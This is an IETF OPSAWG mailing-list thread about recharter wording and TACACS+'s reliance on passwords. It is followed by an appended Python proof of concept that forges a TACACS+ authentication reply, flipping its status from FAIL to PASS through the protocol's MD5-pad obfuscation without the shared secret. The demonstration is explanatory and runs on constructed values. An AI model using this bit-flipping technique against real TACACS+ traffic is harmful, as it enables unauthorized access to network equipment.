Hi Arnaud, 

Agreed, the point you mentioned is a valid pending issue. That was ACKed in 
draft-ietf-opsawg-tacacs-tls13-20#section-5.1. 

OPSAWG is definitely the main entry point for TACACS+. Whether the work will be 
pursued here depends on the availability of a contribution (which we don't have 
right now) and some coordination with groups such as SSHM (noting that 
currently this work seems to be out of scope of SSHM).

Cheers,
Med

> -----Original Message-----
> From: EBALARD Arnaud <arnaud.ebal...@ssi.gouv.fr>
> Sent: Tuesday 15 April 2025 12:15
> To: BOUCADAIR Mohamed INNOV/NET <mohamed.boucad...@orange.com>;
> Gunter Van de Velde <gunter.van_de_ve...@nokia.com>; The IESG
> <i...@ietf.org>
> Cc: opsawg-cha...@ietf.org; opsawg@ietf.org
> Subject: RE: Gunter Van de Velde's No Objection on charter-ietf-opsawg-04-04: (with COMMENT)
> 
> 
> Hi Mohamed,
> 
> I was about to write an email regarding the OPSAWG recharter and how
> the WG will continue to address the operational issues with TACACS+
> (which will remain even after the publication of the tacacs-tls draft).
> The discussion you started on the expected level of work of the WG
> ("minor") and the proposal to clarify it make me feel this is the
> right time to do it.
> 
> TACACS+ is widely deployed for Authentication and Authorization on
> equipment in a lot of networks (large companies, telcos, etc.).
> Being supported by most vendors, having various functional
> benefits, and having this large deployment base, it seems it is here
> to stay. As already discussed in [1], the protocol is old and suffers
> from two major security issues:
> 
>  1/ weak protection of traffic;
>  2/ total reliance on passwords.
> 
> Bit flipping and other issues (which currently allow for trivial
> access to equipment) associated with 1/ will be addressed by what
> has been specified in the tacacs-tls draft. This effort is a good step
> forward but does not address 2/, which is the fundamental problem
> of TACACS+. Even after equipment ships with tacacs-tls,
> administrators (or supervision tools, etc.) on networks with
> TACACS+ deployed will still disseminate their (usually unique, full
> power) password, which will be available in cleartext on all the
> equipment under TACACS+ control. A TACACS+ domain is one where an
> attacker just has to compromise a single weaker piece of equipment
> and wait for a cleartext password to arrive to then have valid
> credentials to access ALL the equipment.
> 
> My questions would be:
>  - is the problem described above a subject to be addressed by the
> WG?
>  - if it is, what is the expected way forward? Specifying support
> for pushing SSH public-keys (draft-dahm-opsawg-tacacs-security-01?)?
> or X.509 certificate anchors? Other options?
>  - if it is not, where can it be addressed? What would be the way
> forward?
> 
> Cheers,
> 
> Arnaud
> 
> [1]: https://mailarchive.ietf.org/arch/msg/opsawg/vdhi_wqIOLTOA7CN42WYk__d2-g/
> 
> -----Original Message-----
> From: mohamed.boucad...@orange.com <mohamed.boucad...@orange.com>
> Sent: Monday 14 April 2025 09:55
> To: Gunter Van de Velde <gunter.van_de_ve...@nokia.com>; The IESG <i...@ietf.org>
> Cc: opsawg-cha...@ietf.org; opsawg@ietf.org
> Subject: [OPSAWG]Re: Gunter Van de Velde's No Objection on charter-ietf-opsawg-04-04: (with COMMENT)
> 
> Hi Gunter,
> 
> There are many OPS-related protocols out there for which we don't
> have a home (IPFIX, DIAMETER, etc.). OPSAWG should not be the place
> to develop major changes (e.g. new versions) of these protocols.
> 
> For example, we used to have OPSAWG tagged as the maintenance group
> for RADIUS
> (https://mailarchive.ietf.org/arch/msg/radext/ygSshqCzKe0uN5aPiN08U_k-gx8/).
> I wasn't personally happy with that at the time for
> the reasons mentioned in that thread. Happily, RADEXT was
> resurrected since then and has its own WG (which is the right thing
> to do).
> 
> I suggest we keep "minor" to make the scope clear. We can
> characterize it if needed, though.
> 
> Thank you.
> 
> Cheers,
> Med
> 
> > -----Original Message-----
> > From: Gunter Van de Velde via Datatracker <nore...@ietf.org>
> > Sent: Monday 14 April 2025 09:25
> > To: The IESG <i...@ietf.org>
> > Cc: opsawg-cha...@ietf.org; opsawg@ietf.org
> > Subject: Gunter Van de Velde's No Objection on charter-ietf-opsawg-04-04: (with COMMENT)
> >
> >
> > Gunter Van de Velde has entered the following ballot position for
> > charter-ietf-opsawg-04-04: No Objection
> >
> > When responding, please keep the subject line intact and reply to all
> > email addresses included in the To and CC lines. (Feel free to cut
> > this introductory paragraph, however.)
> >
> > -------------------------------------------------------------------
> > COMMENT:
> > -------------------------------------------------------------------
> >
> > This charter is refreshingly short, clear in its objective, and keeps
> > things nice and simple. Just a small comment on the text:
> >
> > "
> > Examples include the advancement of documents on the standards track,
> > application statements, maintenance, and minor extensions of documents
> > that were developed in working groups that have concluded, e.g.,
> > IPFIX, network or service level YANG modules, and tools for the
> > Operations and Management Area. "
> >
> > The word "minor" caught my attention. It might be open to
> > interpretation and could lead to debates later on about what qualifies
> > as "minor" versus something more substantial. Would it make sense to
> > drop that word to avoid any unnecessary restrictions or ambiguity down
> > the line?
> >
> >
> 
> ____________________________________________________________________________________________________________
> This message and its attachments may contain confidential or
> privileged information that may be protected by law; they should
> not be distributed, used or copied without authorisation.
> If you have received this email in error, please notify the sender
> and delete this message and its attachments.
> As emails may be altered, Orange is not liable for messages that
> have been modified, changed or falsified.
> Thank you.
> 
> _______________________________________________
> OPSAWG mailing list -- opsawg@ietf.org
> To unsubscribe send an email to opsawg-le...@ietf.org
> 
> The personal data collected and processed during this exchange aims
> solely at completing a business relationship and is limited to the
> necessary duration of that relationship. If you wish to use your rights
> of consultation, rectification and deletion of your data, please
> contact: contact.r...@sgdsn.gouv.fr. If you have received this message
> in error, we thank you for informing the sender and destroying the
> message.
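The "bit flipping" weakness Arnaud lists under 1/, made concrete. This is an added illustration, not code from the thread or from any TACACS+ implementation: it implements the RFC 8907 section 4.5 body obfuscation (an MD5-derived pseudo-pad XORed over the packet body) and shows that an on-path attacker who cannot read the body, and does not know the shared secret, can still turn the status byte of an authentication REPLY from FAIL (0x02) into PASS (0x01), because a XOR stream carries no integrity protection. The secret, session_id and server message are constructed values chosen for the example.

```python
import hashlib
import struct

# Constructed values for this illustration (not taken from the thread):
# the shared secret configured on device and server, and the session_id
# the client picked for this TACACS+ session.
SECRET = b"example-shared-secret"
SESSION_ID = 0x1A2B3C4D
VERSION = 0xC0   # major_version 0xC, minor_version 0 (RFC 8907, section 4.1)
SEQ_NO = 2       # the first server -> client packet of a session has seq_no 2

# Authentication REPLY status codes (RFC 8907, section 5.2)
TAC_PLUS_AUTHEN_STATUS_PASS = 0x01
TAC_PLUS_AUTHEN_STATUS_FAIL = 0x02


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """Keystream from RFC 8907, section 4.5:
    MD5_1 = MD5(session_id, key, version, seq_no)
    MD5_n = MD5(session_id, key, version, seq_no, MD5_n-1)
    concatenated and truncated to the body length.
    session_id is 4 bytes network order; version and seq_no are 1 byte each."""
    prefix = struct.pack("!I", session_id) + key + struct.pack("!BB", version, seq_no)
    pad = b""
    prev = b""
    while len(pad) < length:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """body XOR pseudo_pad. XOR is its own inverse, so the same call de-obfuscates.
    (The 12-byte TACACS+ header is sent in the clear and is not modelled here.)"""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_authen_reply(status: int, server_msg: bytes = b"") -> bytes:
    """Authentication REPLY body: status(1) flags(1) server_msg_len(2) data_len(2) server_msg data."""
    return struct.pack("!BBHH", status, 0, len(server_msg), 0) + server_msg


def authen_reply_status(body: bytes) -> int:
    return body[0]


def flip_fail_to_pass(obfuscated_body: bytes) -> bytes:
    """What an on-path attacker does, with no knowledge of the secret.
    The status byte sits at a fixed offset (0) of the body and the pad is a
    XOR stream, so XORing FAIL ^ PASS into the obfuscated byte XORs the same
    difference into the plaintext the device will recover."""
    delta = TAC_PLUS_AUTHEN_STATUS_FAIL ^ TAC_PLUS_AUTHEN_STATUS_PASS   # 0x03
    return bytes([obfuscated_body[0] ^ delta]) + obfuscated_body[1:]


def demo() -> tuple:
    """Returns (status the server sent, status the device decodes after tampering)."""
    sent = build_authen_reply(TAC_PLUS_AUTHEN_STATUS_FAIL, b"Login incorrect")
    on_wire = obfuscate(sent, SESSION_ID, SECRET, VERSION, SEQ_NO)
    tampered = flip_fail_to_pass(on_wire)
    # The device de-obfuscates with the correct secret and sees nothing wrong:
    # the length fields and server_msg are intact, only the status changed.
    recovered = obfuscate(tampered, SESSION_ID, SECRET, VERSION, SEQ_NO)
    return authen_reply_status(sent), authen_reply_status(recovered)


if __name__ == "__main__":
    before, after = demo()
    print(f"server sent status 0x{before:02x}, device decoded 0x{after:02x}")
```

Nothing in the packet lets the device detect the change: there is no MAC over the body, and the server_msg still decodes to the text the server wrote. Running TACACS+ over TLS, as the tacacs-tls draft specifies, gives the stream the integrity that this obfuscation lacks; it does not change what is being authenticated, which is the password problem raised under 2/.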